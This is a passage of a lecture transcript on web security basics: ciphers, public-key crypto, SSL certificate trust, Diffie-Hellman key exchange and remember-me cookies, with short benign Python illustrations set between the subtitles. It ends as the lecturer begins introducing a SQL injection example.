00:47:45,726 --> 00:47:48,406
like nonsense, they're not
going to know what it is,

1114
00:47:48,406 --> 00:47:51,106
or they're at least not going to
care to decrypt it by figuring

1115
00:47:51,106 --> 00:47:52,466
out how you encrypted it.

1116
00:47:52,466 --> 00:47:55,316
So, in short, nice little
childhood encryption scheme.
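
That letter-shifting scheme can be sketched in a few lines of Python. The function name and the sample note are made up for illustration; a shift of 13 gives ROT13.

```python
import string


def caesar(text, shift):
    """Shift each letter by `shift` places, wrapping around the alphabet.

    Non-letters (spaces, punctuation) pass through unchanged.
    """
    result = []
    for ch in text:
        if ch in string.ascii_lowercase:
            result.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            result.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            result.append(ch)
    return "".join(result)


note = "Meet me after class"
scrambled = caesar(note, 1)        # A becomes B, B becomes C, and so on
print(scrambled)
print(caesar(scrambled, -1))       # shifting back recovers the note
```

Both sides have to know the shift ahead of time, which is exactly the shared secret that two strangers on the Internet don't have.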

1117
00:47:55,746 --> 00:47:58,766
So the problem with that is that
if Jack is some random website

1118
00:47:58,766 --> 00:48:00,846
on the Internet from whom
I want to buy something

1119
00:48:00,846 --> 00:48:02,196
for the first time, Jack

1120
00:48:02,196 --> 00:48:05,066
and I do not have some known
algorithm that we can use.

1121
00:48:05,066 --> 00:48:07,206
I can't just write
him a purchase order

1122
00:48:07,366 --> 00:48:10,086
and then encrypt it by
changing A's to B's, B's to C's,

1123
00:48:10,086 --> 00:48:11,436
and handing it to
him over the Internet

1124
00:48:11,436 --> 00:48:13,136
because he's obviously
not going to know how

1125
00:48:13,136 --> 00:48:14,366
to reverse that process.

1126
00:48:14,836 --> 00:48:18,236
So, I could call him up, we
could agree on some secret

1127
00:48:18,236 --> 00:48:20,606
like rotate all the letters
one place or something stupid

1128
00:48:20,606 --> 00:48:23,456
like that, but obviously this
is not how Amazon.com works,

1129
00:48:23,456 --> 00:48:24,686
or real stores work.

1130
00:48:24,896 --> 00:48:28,266
So public-key crypto is an
alternative to that scenario,

1131
00:48:28,266 --> 00:48:30,476
which is generally called
secret-key crypto where Jack

1132
00:48:30,476 --> 00:48:31,346
and I have some secret.

1133
00:48:31,346 --> 00:48:33,916
If that's not going to work
I can instead use public-key

1134
00:48:33,916 --> 00:48:37,476
crypto whereby I have a
public key and a private key,

1135
00:48:37,796 --> 00:48:39,646
Jack has a public key
and a private key,

1136
00:48:39,676 --> 00:48:41,626
and the nice feature
of public keys is

1137
00:48:41,626 --> 00:48:44,366
that as their name suggests you
can broadcast them to the world.

1138
00:48:44,366 --> 00:48:45,746
You can display them
on your website.

1139
00:48:45,746 --> 00:48:47,286
You can put them in
your email signatures.

1140
00:48:47,286 --> 00:48:48,626
You can just send
them in the clear

1141
00:48:48,626 --> 00:48:51,426
over the Internet whenever
someone asks you for it.

1142
00:48:51,656 --> 00:48:54,686
And indeed the way SSL
and other algorithms work

1143
00:48:54,686 --> 00:48:57,536
to get started is if I am
trying to buy something

1144
00:48:57,536 --> 00:48:59,626
from Jack's website
and it's using SSL,

1145
00:48:59,956 --> 00:49:02,526
Jack's website essentially says,
"Here, this is my public key,

1146
00:49:02,526 --> 00:49:04,616
use this to send me
information securely."

1147
00:49:04,866 --> 00:49:07,206
And before I send him
any messages or orders

1148
00:49:07,206 --> 00:49:10,396
or credit card information
I first take my information

1149
00:49:10,396 --> 00:49:12,096
and I encrypt it
with his public key,

1150
00:49:12,386 --> 00:49:15,146
then I transmit the cipher
text, the scrambled stuff,

1151
00:49:15,296 --> 00:49:17,856
across the Internet to him,
because what's the only key

1152
00:49:17,856 --> 00:49:20,466
in the world that can unlock
or decrypt that message now?

1153
00:49:21,306 --> 00:49:21,606
Axle?

1154
00:49:21,896 --> 00:49:23,216
>> Well, that's the private key.

1155
00:49:23,216 --> 00:49:23,956
>> The private key.

1156
00:49:23,956 --> 00:49:24,826
>> He's the only
one who has that.

1157
00:49:25,016 --> 00:49:25,446
>> Exactly.

1158
00:49:25,506 --> 00:49:27,816
He, by definition of
private is the only one

1159
00:49:27,816 --> 00:49:28,816
who should have that.

1160
00:49:28,886 --> 00:49:30,866
He's made a mistake if he
gives it to anyone else.

1161
00:49:31,126 --> 00:49:33,306
So only he should be able
to decrypt that message.

1162
00:49:33,306 --> 00:49:34,326
And similarly if he wants

1163
00:49:34,326 --> 00:49:37,086
to send me a secret message I
can just give him my public key,

1164
00:49:37,086 --> 00:49:40,596
like I can anyone else,
and that process can happen

1165
00:49:40,596 --> 00:49:41,706
in the other direction as well.

1166
00:49:41,986 --> 00:49:44,286
In reality something like
SSL uses a little bit

1167
00:49:44,286 --> 00:49:46,506
of public-key crypto as well
as some other techniques

1168
00:49:46,506 --> 00:49:49,006
because it tends to be a little
more expensive computationally

1169
00:49:49,326 --> 00:49:53,746
than secret-key crypto, but that
in general is the key property.

1170
00:49:54,056 --> 00:49:55,766
So, how does this help us?

1171
00:49:55,766 --> 00:49:59,536
Well, so SSL is again, as Axle
said, it's this chain of trust.

1172
00:49:59,536 --> 00:50:04,066
You buy an SSL certificate and
it will just work mathematically

1173
00:50:04,296 --> 00:50:05,946
but until the browser --

1174
00:50:05,946 --> 00:50:08,476
until you pay someone
for that certificate

1175
00:50:08,476 --> 00:50:11,896
and have them digitally sign
the certificate, so to speak,

1176
00:50:12,086 --> 00:50:14,006
no one else in the
world is supposed

1177
00:50:14,006 --> 00:50:14,976
to trust the certificate.

1178
00:50:15,396 --> 00:50:18,036
Because recall from a few
weeks ago various browsers, IE,

1179
00:50:18,846 --> 00:50:22,146
and Firefox, and Chrome,
and the like all ship

1180
00:50:22,496 --> 00:50:25,696
with certain certificate
authority keys in them --

1181
00:50:25,696 --> 00:50:28,636
certificate authority
certificates in them,

1182
00:50:28,636 --> 00:50:33,276
which says Chrome will trust any
SSL certificate from GoDaddy,

1183
00:50:33,276 --> 00:50:35,296
from VeriSign, and from
this list of a whole bunch

1184
00:50:35,346 --> 00:50:37,776
of other SSL certificate
selling companies.

1185
00:50:38,196 --> 00:50:40,946
So, if you have not bought
your certificate from one

1186
00:50:40,946 --> 00:50:43,946
of those companies Chrome is
going to do what to the user

1187
00:50:43,946 --> 00:50:45,156
when you try to visit
the website?

1188
00:50:45,286 --> 00:50:45,466
Jack?

1189
00:50:45,676 --> 00:50:48,896
>> Send some crazy warning
to you that says like,

1190
00:50:48,896 --> 00:50:50,706
this site has an invalid
security certificate

1191
00:50:50,706 --> 00:50:53,916
and you shouldn't stay here,

1192
00:50:53,916 --> 00:50:55,086
or it might be dangerous
[inaudible].

1193
00:50:55,446 --> 00:50:55,966
>> Exactly.

1194
00:50:56,226 --> 00:50:58,646
You will get some warning
message scaring you.

1195
00:50:59,016 --> 00:51:00,796
Chrome tends to look
like this right now.

1196
00:51:00,796 --> 00:51:02,726
"This site's security
certificate is not trusted!"

1197
00:51:03,046 --> 00:51:04,906
I ironically as I did
a few weeks ago went

1198
00:51:04,966 --> 00:51:07,996
to cs.harvard.edu, which has
not paid for an SSL certificate,

1199
00:51:08,236 --> 00:51:10,866
and you see a big red X, you
see a big red screen here

1200
00:51:10,866 --> 00:51:13,556
which means you can't actually
proceed unless you click

1201
00:51:13,806 --> 00:51:14,356
this button.

1202
00:51:14,356 --> 00:51:17,006
Now, out of curiosity
what do most of you do

1203
00:51:17,006 --> 00:51:18,616
when you encounter
a website like this?

1204
00:51:19,916 --> 00:51:20,046
Ben?

1205
00:51:20,046 --> 00:51:20,916
>> Keep going.

1206
00:51:20,916 --> 00:51:21,736
>> You just keep going.

1207
00:51:21,736 --> 00:51:23,146
Anyone else just keep going?

1208
00:51:24,066 --> 00:51:24,786
Yeah? Axle?

1209
00:51:24,786 --> 00:51:25,186
I mean I do.

1210
00:51:25,186 --> 00:51:27,216
>> If you wanted to access the
website in the first place.

1211
00:51:27,476 --> 00:51:28,766
>> Right, if you want
to access the website

1212
00:51:28,766 --> 00:51:30,856
and you know you haven't
mistyped it, so you haven't gone

1213
00:51:30,856 --> 00:51:32,216
to some sketchy random website.

1214
00:51:32,216 --> 00:51:33,286
You're where you want to be.

1215
00:51:33,556 --> 00:51:35,806
This generally signifies
an error,

1216
00:51:35,806 --> 00:51:37,706
or a lack of payment,
or the like.

1217
00:51:37,966 --> 00:51:40,336
So I would propose, and I
have no data to back this up,

1218
00:51:40,336 --> 00:51:41,946
that most people
probably proceed.

1219
00:51:42,146 --> 00:51:45,106
Now, in fairness, Chrome makes
it pretty easy to proceed,

1220
00:51:45,106 --> 00:51:47,416
you literally just
click proceed now.

1221
00:51:47,696 --> 00:51:52,296
If I instead use something
like Firefox and go in here,

1222
00:51:54,846 --> 00:51:57,206
Firefox is a real
pain in the neck.

1223
00:51:57,406 --> 00:52:02,386
So, if you've ever used
Firefox here is how you get

1224
00:52:02,386 --> 00:52:03,006
around this issue.

1225
00:52:03,006 --> 00:52:05,616
And this is kind of tragic
because if you do screw up,

1226
00:52:05,616 --> 00:52:06,976
or you don't want to
pay for a certificate,

1227
00:52:06,976 --> 00:52:07,936
and you pretty much should.

1228
00:52:08,226 --> 00:52:10,466
Or if you generate
your own certificate

1229
00:52:10,466 --> 00:52:12,266
and do what's called
self-signing it,

1230
00:52:12,266 --> 00:52:14,216
in other words you do
the mathematics yourself,

1231
00:52:14,216 --> 00:52:17,146
which is totally legitimate
in terms of the formula,

1232
00:52:17,506 --> 00:52:20,426
but you haven't had anyone
else vouch for you like GoDaddy

1233
00:52:20,426 --> 00:52:23,676
or VeriSign, here is what
your friends or family

1234
00:52:23,676 --> 00:52:26,976
or customers would
have to do on Firefox.

1235
00:52:27,086 --> 00:52:29,446
One, they're probably not going
to click "get me out of here."

1236
00:52:29,646 --> 00:52:32,076
They're instead going to have to
click "I understand the risks."

1237
00:52:32,456 --> 00:52:38,246
Add exception, get certificate,
confirm security exception.

1238
00:52:38,786 --> 00:52:42,216
And now you can proceed,
and so forth.

1239
00:52:42,716 --> 00:52:44,426
And right now it's
hanging for just a moment.

1240
00:52:44,426 --> 00:52:44,866
There we go.

1241
00:52:45,226 --> 00:52:47,196
Now it redirected to
the actual CS page.

1242
00:52:47,456 --> 00:52:50,986
So no, most people are not going
to do that, even I get annoyed

1243
00:52:50,986 --> 00:52:53,076
as anything when I have
to go through those hoops.

1244
00:52:53,076 --> 00:52:55,996
So in short, this is why you
pay for an SSL certificate.

1245
00:52:56,136 --> 00:52:57,826
Now the theory behind
it is great.

1246
00:52:57,896 --> 00:53:00,076
As we discussed a couple
weeks ago, chain of trust,

1247
00:53:00,076 --> 00:53:02,516
it's very reasonable,
it's a nice way of sort

1248
00:53:02,516 --> 00:53:03,856
of ensuring there's a mechanism

1249
00:53:03,856 --> 00:53:06,676
in place whereby you're not
visiting potentially bad guys

1250
00:53:06,856 --> 00:53:08,496
or the wrong websites.

1251
00:53:08,906 --> 00:53:12,596
But again, it's nice in theory,

1252
00:53:12,596 --> 00:53:15,936
it's not necessarily
the best experience

1253
00:53:15,936 --> 00:53:19,466
in the end in practice.

1254
00:53:19,566 --> 00:53:20,876
All right, any questions?

1255
00:53:21,066 --> 00:53:27,426
All right, so rather than scare
with some math let's go ahead

1256
00:53:27,426 --> 00:53:28,466
and take our five
minute break here,

1257
00:53:28,466 --> 00:53:30,156
but when we come back
we'll give an example

1258
00:53:30,156 --> 00:53:33,146
of how you can implement
public-key cryptography

1259
00:53:33,146 --> 00:53:34,556
to make it a little
more concrete

1260
00:53:34,556 --> 00:53:36,896
than just there's math
that makes it work.

1261
00:53:37,006 --> 00:53:38,256
And then we'll also
take a look at a bunch

1262
00:53:38,256 --> 00:53:40,166
of other threats
including involving SQL,

1263
00:53:40,206 --> 00:53:41,276
JavaScript, and HTML.

1264
00:53:41,276 --> 00:53:49,236
So why don't we go ahead and
take our five minute break here.

1265
00:53:49,436 --> 00:53:50,026
All right.

1266
00:53:50,496 --> 00:53:53,696
So, math time, though it's
fairly formulaic math.

1267
00:53:54,236 --> 00:53:57,986
All right, so how do
you possibly send --

1268
00:53:58,056 --> 00:54:01,626
come up with a public and
a private key in such a way

1269
00:54:01,626 --> 00:54:05,786
that you can use the public key
to reverse the effects of --

1270
00:54:05,786 --> 00:54:08,156
rather, you can use the private
key to reverse the effects

1271
00:54:08,156 --> 00:54:12,846
of the public key and
ultimately exchange some secret?

1272
00:54:12,846 --> 00:54:16,196
So, there's a couple of very
popular protocols when it comes

1273
00:54:16,236 --> 00:54:17,666
to public key cryptography.

1274
00:54:17,666 --> 00:54:20,136
RSA is one with which
you're probably familiar,

1275
00:54:20,136 --> 00:54:21,016
at least by name.

1276
00:54:21,286 --> 00:54:23,266
Has to do with coming
up with a public

1277
00:54:23,266 --> 00:54:26,336
and a private key using
very interesting properties

1278
00:54:26,336 --> 00:54:29,266
of large numbers that when
multiplied together are very

1279
00:54:29,266 --> 00:54:30,826
difficult to un-multiply

1280
00:54:30,876 --> 00:54:34,446
or factor back down
to their primes.
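As a rough illustration of the RSA idea just mentioned, here is a minimal Python sketch. The tiny primes 61 and 53, the exponent 17, and the message 65 are assumptions chosen only for readability; real keys use primes hundreds of digits long, plus padding that this sketch leaves out.

```python
# Toy RSA with tiny primes; for illustration only, never for real use.
p, q = 61, 53                 # secret primes (assumed example values)
n = p * q                     # modulus, published as part of the public key
phi = (p - 1) * (q - 1)       # easy to compute only if you know p and q
e = 17                        # public exponent, chosen coprime with phi
d = pow(e, -1, phi)           # private exponent: modular inverse of e (Python 3.8+)

message = 65                  # a message encoded as a number smaller than n
ciphertext = pow(message, e, n)     # anyone can encrypt with the public key (e, n)
recovered = pow(ciphertext, d, n)   # only the holder of d can decrypt

print(ciphertext, recovered)
```

Recovering d from (e, n) alone would require factoring n back into p and q, which is the step that becomes impractical when the primes are large.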

1281
00:54:34,526 --> 00:54:37,996
So -- but that one's a little
more involved and so a nice one

1282
00:54:37,996 --> 00:54:39,676
to use for the sake of
discussion when it comes

1283
00:54:39,676 --> 00:54:42,846
to public-key crypto is something
called Diffie-Hellman, or DLP.

1284
00:54:42,846 --> 00:54:44,316
And this is an algorithm

1285
00:54:44,316 --> 00:54:47,276
that similarly involves
public-key cryptography,

1286
00:54:47,506 --> 00:54:50,406
but it's an interesting example
of how you can essentially shout

1287
00:54:50,406 --> 00:54:56,586
across a crowded room some
number and your partner, B,

1288
00:54:56,586 --> 00:55:00,106
can do the same and somehow
together that mere exchange

1289
00:55:00,106 --> 00:55:02,016
of that information
is enough to come

1290
00:55:02,016 --> 00:55:03,716
up with a public/private
key pair.

1291
00:55:04,056 --> 00:55:05,876
So this story works as follows.

1292
00:55:05,876 --> 00:55:11,296
In the case here of Alice and
Bob we have the following story.

1293
00:55:11,396 --> 00:55:14,736
Alice and Bob in advance are
going to agree upon two numbers,

1294
00:55:14,826 --> 00:55:18,806
G and P. P is going to be some
prime number, and G is going

1295
00:55:18,806 --> 00:55:20,406
to be what's generally
called a generator,

1296
00:55:20,406 --> 00:55:21,516
which is often the number two.

1297
00:55:21,706 --> 00:55:22,516
As simple as that.

1298
00:55:22,516 --> 00:55:24,266
But P is a big prime number

1299
00:55:24,426 --> 00:55:26,196
and they can choose
P however they like.

1300
00:55:26,196 --> 00:55:27,696
So they have to agree
upon those in advance,

1301
00:55:27,926 --> 00:55:29,336
they can tell their
friends and announce

1302
00:55:29,376 --> 00:55:31,216
to the world what they are,
these are not secret values,

1303
00:55:31,246 --> 00:55:33,226
but they have to
decide on them upfront.

1304
00:55:33,686 --> 00:55:36,546
So then Alice decides
on some random number A,

1305
00:55:36,546 --> 00:55:38,606
and Bob similarly decides

1306
00:55:38,606 --> 00:55:40,746
on some random number B. They
don't tell each other these

1307
00:55:40,746 --> 00:55:43,556
numbers, but they choose them
in isolation of each other,

1308
00:55:43,756 --> 00:55:45,716
and then they perform
a bit of mathematics,

1309
00:55:45,786 --> 00:55:50,106
specifically Alice goes ahead
and computes this value here.

1310
00:55:50,566 --> 00:55:57,396
G to the A mod P. In other
words, Alice goes ahead

1311
00:55:58,096 --> 00:56:00,886
and takes G, which is
probably the number two,

1312
00:56:01,156 --> 00:56:05,086
raises it to the power A,
and then does modulo P.

1313
00:56:05,146 --> 00:56:07,586
What does the modulo
operator generally do?

1314
00:56:08,006 --> 00:56:08,616
Yeah, Isaac?

1315
00:56:09,276 --> 00:56:13,556
>> Well it's kind of
like the remainder.

1316
00:56:13,556 --> 00:56:14,156
>> Okay, yeah.

1317
00:56:14,156 --> 00:56:15,276
It's kind of like the remainder.

1318
00:56:15,276 --> 00:56:21,146
It's what you would get if
you were to divide some value,

1319
00:56:21,146 --> 00:56:22,776
like G to the A, by some value.

1320
00:56:22,776 --> 00:56:25,106
It's what you have left over
if it doesn't divide evenly.
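To make the remainder idea concrete, here is a small Python sketch. The values of g, a, and p are hypothetical small numbers picked for illustration, not values from the lecture slides.

```python
# The % operator gives the remainder after integer division.
print(17 % 5)    # 17 = 3 * 5 + 2, so this prints 2
print(20 % 5)    # 20 divides evenly by 5, so this prints 0

# "G to the A mod P" with small, hypothetical values.
g, a, p = 2, 10, 23
direct = (g ** a) % p     # build the full power first, then take the remainder
modular = pow(g, a, p)    # three-argument pow reduces mod p as it goes

print(direct == modular)  # prints True: both approaches agree
```

The three-argument form matters in practice because G to the A is far too large to write out when A has hundreds of digits.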

1321
00:56:25,376 --> 00:56:28,066
And as an aside I'm trying a new
program for the first time here

1322
00:56:28,066 --> 00:56:30,236
which is why I have this
trial software on the screen,

1323
00:56:30,266 --> 00:56:31,626
but it's the only way
I could try drawing

1324
00:56:31,626 --> 00:56:32,496
for the first time here today.

1325
00:56:33,236 --> 00:56:36,126
So G to the A mod P ends
up being some number,

1326
00:56:36,396 --> 00:56:40,086
and we're going to call it
generically T sub A. So it's T

1327
00:56:40,086 --> 00:56:43,066
and it's Alice's T. So
what does Alice then do?

1328
00:56:43,066 --> 00:56:47,126
She transmits that number, G
to the A mod P, otherwise known

1329
00:56:47,126 --> 00:56:50,426
as T sub A, across the Internet,
in the clear, doesn't matter.

1330
00:56:50,676 --> 00:56:52,866
So in other words, even though
it's drawn here mathematically

1331
00:56:52,866 --> 00:56:56,356
as G to the A mod P, she doesn't
send that written expression.

1332
00:56:56,416 --> 00:56:58,986
She sends the result of
that arithmetic operation,

1333
00:56:58,986 --> 00:57:03,456
T sub A. So Bob does the same
thing but using his B instead

1334
00:57:03,456 --> 00:57:05,896
of A. So he gets some number,
sends that across the Internet.

1335
00:57:06,166 --> 00:57:09,356
So at this point in the story
Alice has sent that first box,

1336
00:57:09,676 --> 00:57:13,626
Bob has now sent this second
box, and so now Alice has what?

1337
00:57:13,696 --> 00:57:16,206
She has A, because
she came up with it,

1338
00:57:16,346 --> 00:57:21,026
and she also has T sub B.
Similarly, Bob has B,

1339
00:57:21,566 --> 00:57:23,776
and T sub A. So those
are the values

1340
00:57:23,816 --> 00:57:25,146
that have now been exchanged.

1341
00:57:25,516 --> 00:57:26,916
So what do they then do?

1342
00:57:27,286 --> 00:57:28,906
They then both go ahead

1343
00:57:28,906 --> 00:57:31,696
and compute this
value and this value.

1344
00:57:31,986 --> 00:57:35,586
Alice computes T sub B
raised to the A power.

1345
00:57:35,616 --> 00:57:36,746
Now what does that mean?

1346
00:57:37,136 --> 00:57:40,326
Well, T sub B is
just our variable

1347
00:57:40,326 --> 00:57:42,096
that represents what
Bob sent her.

1348
00:57:42,476 --> 00:57:45,216
So she's raising whatever Bob
sent her to the power of A.

1349
00:57:45,216 --> 00:57:49,016
And Bob does the same
thing, raising to the power

1350
00:57:49,016 --> 00:57:50,486
of B what Alice sent him.

1351
00:57:51,336 --> 00:57:54,796
But if you recall how
exponentiation works,

1352
00:57:54,796 --> 00:57:56,796
when you raise something
to the power and then again

1353
00:57:56,796 --> 00:57:59,336
to another power you end up
multiplying the exponents.

1354
00:57:59,786 --> 00:58:02,186
So mathematically
what both Alice

1355
00:58:02,186 --> 00:58:05,796
and Bob have done here is raise
G, which again is some number

1356
00:58:05,796 --> 00:58:10,646
like two, to the power
of A times B, or rather,

1357
00:58:10,646 --> 00:58:13,086
power of B times A, but
that's the same thing.

1358
00:58:13,086 --> 00:58:15,616
With multiplication you can
do it in either direction,

1359
00:58:16,066 --> 00:58:19,296
mod P. So at this point
in the story Alice has A,

1360
00:58:19,296 --> 00:58:25,976
she has T sub B, but she
also has G to the AB mod P,

1361
00:58:26,776 --> 00:58:29,356
even though she doesn't
know what B is.

1362
00:58:29,506 --> 00:58:32,506
And Bob conversely has the
same resulting value,

1363
00:58:32,506 --> 00:58:37,016
G to the AB mod P, and he
has B, but he doesn't have A.
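The exchange described above can be sketched in a few lines of Python. This is only a toy under stated assumptions: the prime 23 is far too small for real use, and the function name diffie_hellman_demo is made up for this example.

```python
import secrets

def diffie_hellman_demo(p=23, g=2):
    """Walk through the exchange with toy public values p (prime) and g (generator)."""
    a = secrets.randbelow(p - 2) + 1   # Alice's secret number, never transmitted
    b = secrets.randbelow(p - 2) + 1   # Bob's secret number, never transmitted

    t_a = pow(g, a, p)   # Alice sends T sub A in the clear
    t_b = pow(g, b, p)   # Bob sends T sub B in the clear

    alice_shared = pow(t_b, a, p)   # (g^b)^a mod p
    bob_shared = pow(t_a, b, p)     # (g^a)^b mod p
    return a, b, alice_shared, bob_shared

a, b, alice_shared, bob_shared = diffie_hellman_demo()
print(alice_shared == bob_shared)   # prints True: both equal g^(a*b) mod p
```

An eavesdropper sees p, g, T sub A, and T sub B, but not A or B. In practice the shared value is typically used to derive a key for secret-key encryption rather than being used directly.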

1364
00:58:37,536 --> 00:58:41,026
So we seem to have constructed
a scenario in which both Alice

1365
00:58:41,026 --> 00:58:46,796
and Bob have some shared
secret, rather where Alice

1366
00:58:46,796 --> 00:58:51,556
and Bob both have some
value, G to the AB mod P,

1367
00:58:51,916 --> 00:58:56,466
but each of them only has a
piece of the rest of the puzzle.

1368
00:58:56,466 --> 00:58:59,886
Alice has A, Bob has
B. So essentially Alice

1369
00:58:59,886 --> 00:59:03,756
and Bob can now use this
number to encrypt information

1370
00:59:03,806 --> 00:59:05,576
and they can reverse its effects

1371
00:59:06,246 --> 00:59:09,246
by using their own
respective private keys.

1372
00:59:09,976 --> 00:59:12,056
So it's not quite
identical to, for instance,

1373
00:59:12,056 --> 00:59:13,616
what a browser would
use these days,

1374
00:59:13,616 --> 00:59:15,106
it's sort of a simpler version,

1375
00:59:15,106 --> 00:59:17,226
or simpler story
of what's possible.

1376
00:59:17,676 --> 00:59:20,726
But it hints at how the
mathematics can behave

1377
00:59:20,726 --> 00:59:23,616
in such a way that you can
share some information publicly,

1378
00:59:23,616 --> 00:59:26,866
like me just talking to Jack's
web server, or me just talking

1379
00:59:26,866 --> 00:59:28,236
to Bob in this scenario,

1380
00:59:28,686 --> 00:59:31,676
and nonetheless preserving
some notion

1381
00:59:31,676 --> 00:59:35,176
of privacy whereby there's
still a number that only I know

1382
00:59:35,406 --> 00:59:37,846
and can use for the
decryption part.

1383
00:59:37,846 --> 00:59:41,576
All right, so now let's
try a concrete example

1384
00:59:41,576 --> 00:59:42,756
of the SQL injection attack.

1385
00:59:42,756 --> 00:59:44,256
We've been talking
about it for some time

1386
00:59:44,666 --> 00:59:46,226
but haven't necessarily
teased it apart.

1387
00:59:46,226 --> 00:59:48,396
So here's a login form up top.

1388
00:59:48,396 --> 00:59:50,136
It's representative
of most login forms.

1389
00:59:50,136 --> 00:59:52,376
You got a username, a password
field, and then a checkbox

1390
00:59:52,376 --> 00:59:53,406
for keeping me logged in.

1391
00:59:53,836 --> 00:59:57,456
Now as an aside, before we
look at the SQL, how does a box

1392
00:59:57,456 --> 00:59:59,496
like that generally
get implemented?

1393
01:00:00,036 --> 01:00:01,326
Facebook has something
like this;

1394
01:00:01,326 --> 01:00:02,836
most websites have
something like this.

1395
01:00:03,426 --> 01:00:05,606
And when you check that it
obviously keeps you logged

1396
01:00:05,606 --> 01:00:09,866
in either for seven days
or until you explicitly log out.

1397
01:00:09,866 --> 01:00:10,556
Yeah, Axle?

1398
01:00:10,796 --> 01:00:15,696
>> Well it has to store the
login variable in a cookie.

1399
01:00:16,286 --> 01:00:20,966
Right? Because the session would
be destroyed once you closed the

1400
01:00:20,966 --> 01:00:21,716
browser window.

1401
01:00:21,926 --> 01:00:22,136
>> Good.

1402
01:00:22,136 --> 01:00:23,326
>> So if you want
to be still logged

1403
01:00:23,326 --> 01:00:25,636
in when you open it again you
have to store it [inaudible].

1404
01:00:25,636 --> 01:00:26,196
>> Good. Exactly.

1405
01:00:26,196 --> 01:00:29,086
So, by checking this box I'm
essentially asking the web

1406
01:00:29,086 --> 01:00:32,416
server, plant a cookie
on my hard drive

1407
01:00:32,916 --> 01:00:37,206
that somehow will remind you who
I am and that I have logged in.

1408
01:00:37,326 --> 01:00:39,406
Now in the worst possible
implementation of this,

1409
01:00:39,756 --> 01:00:42,736
that box could result in
the server setting a cookie

1410
01:00:42,736 --> 01:00:44,146
with both my username
and password

1411
01:00:44,316 --> 01:00:46,796
so that anytime I visit it
just sends it again and again

1412
01:00:46,796 --> 01:00:49,026
and then when I finally logout
it just deletes those cookies.

1413
01:00:49,276 --> 01:00:51,446
But that's of course not a good
mechanism, we talked earlier

1414
01:00:51,446 --> 01:00:52,756
about HTTPS and if it's sent

1415
01:00:52,756 --> 01:00:54,876
in the clear you're just telling
the whole world your username

1416
01:00:54,876 --> 01:00:55,336
and password.

1417
01:00:55,496 --> 01:00:56,666
Plus it's just not necessary.

1418
01:00:56,966 --> 01:00:59,386
So instead what this button
would probably do is tell the

1419
01:00:59,386 --> 01:01:02,306
web server to set another
cookie that's not the PHPSESSID,

1420
01:01:02,306 --> 01:01:03,676
which is a PHP specific thing,

1421
01:01:03,676 --> 01:01:05,396
it's just for the
superglobals purpose.

1422
01:01:06,146 --> 01:01:07,356
Instead setting a cookie

1423
01:01:07,356 --> 01:01:10,386
with the set cookie function
that's called authenticated,

1424
01:01:10,386 --> 01:01:11,216
or something like that.

1425
01:01:11,216 --> 01:01:14,646
And that key authenticated has
some value that's similarly a

1426
01:01:14,706 --> 01:01:16,226
big random looking number,

1427
01:01:16,426 --> 01:01:18,476
but that big random
looking number is remembered

1428
01:01:18,476 --> 01:01:20,086
on the server, maybe
in some database,

1429
01:01:20,456 --> 01:01:22,426
and the next time
the server sees

1430
01:01:22,476 --> 01:01:24,626
that same big random
number in a cookie,

1431
01:01:25,166 --> 01:01:27,146
it checks its database
and sees, oh,

1432
01:01:27,306 --> 01:01:30,756
I gave this big random number
to Isaac, let me assume

1433
01:01:30,896 --> 01:01:32,306
that this is Isaac again

1434
01:01:32,556 --> 01:01:34,996
and show him Isaac's
Facebook profile,

1435
01:01:35,056 --> 01:01:37,066
or whatever website
he's actually visiting.
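The "big random looking number" approach might look roughly like the following Python sketch. The dictionary stands in for a database table, and the function names are hypothetical; a real site would also set an expiration and send the cookie only over HTTPS.

```python
import secrets

# Stand-in for a server-side database table: token -> username.
remembered_logins = {}

def issue_token(username):
    """Create an unguessable token and remember which user it belongs to."""
    token = secrets.token_hex(32)      # 64 hex characters of randomness
    remembered_logins[token] = username
    return token                       # this value would go in the cookie

def user_for_token(token):
    """Look up the user for a cookie value, or None if it is unknown."""
    return remembered_logins.get(token)

def forget_token(token):
    """Called on explicit logout so the cookie value stops working."""
    remembered_logins.pop(token, None)

cookie_value = issue_token("isaac")
print(user_for_token(cookie_value))    # prints isaac
```

The cookie carries no username or password, only a value that is meaningless without the server's lookup table.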

1436
01:01:37,336 --> 01:01:39,686
Now of course you're
still vulnerable to what?

1437
01:01:42,916 --> 01:01:43,156
>> Physical [inaudible].

1438
01:01:43,246 --> 01:01:45,026
>> Okay, physical access
is always a problem,

1439
01:01:45,026 --> 01:01:45,696
but what else here?

1440
01:01:46,346 --> 01:01:46,536
Jack?

1441
01:01:46,996 --> 01:01:47,626
>> Packet sniffing.

1442
01:01:47,826 --> 01:01:48,466
>> Packet sniffing.

1443
01:01:48,466 --> 01:01:52,226
Right? If it's not HTTPS this
feature is even worse now

1444
01:01:52,226 --> 01:01:54,696
because sessions are
generally ephemeral, right?

1445
01:01:54,696 --> 01:01:57,136
They only exist for the
life of that browser window.

1446
01:01:57,466 --> 01:02:00,156
But something like a cookie
that has a seven day expiration

1447
01:02:00,156 --> 01:02:02,986
or no expiration, that
means someone can sniff this

1448
01:02:02,986 --> 01:02:06,136
and use it anytime they want
so all the more reason to ensure

1449
01:02:06,136 --> 01:02:07,586
that this is encrypted.

1450
01:02:08,746 --> 01:02:10,426
All right, so now
the SQL part of this.

1451
01:02:10,836 --> 01:02:13,656
Suppose that this
form is a login form

1452
01:02:14,196 --> 01:02:15,406
that essentially results

1453
01:02:15,406 --> 01:02:17,946
in a SQL query getting
generated like this one here.

1454
01:02:18,336 --> 01:02:21,296
So we have -- this can be
implemented in a few ways,

1455
01:02:21,296 --> 01:02:25,076
and I went with the MySQL query
version of this specifically

1456
01:02:25,386 --> 01:02:28,276
so that the inputs
would not be escaped.

1457
01:02:28,666 --> 01:02:32,216
So let me go ahead
here and zoom in a bit.

1458
01:02:32,396 --> 01:02:33,786
And what do we have here?

1459
01:02:33,786 --> 01:02:36,466
So on the left we just have
a variable called result

1460
01:02:36,466 --> 01:02:37,446
for our result set.

1461
01:02:37,446 --> 01:02:39,066
To the right we have
mysql_query,

1462
01:02:39,366 --> 01:02:42,436
recall which was the function we
used initially a couple lectures

1463
01:02:42,436 --> 01:02:44,326
ago for executing SQL commands.

1464
01:02:44,736 --> 01:02:45,826
Then I'm using sprintf.

1465
01:02:45,826 --> 01:02:47,926
Does anyone recall
what sprintf does?

1466
01:02:48,206 --> 01:02:51,466
It's not strictly necessary
but it's a possible approach?

1467
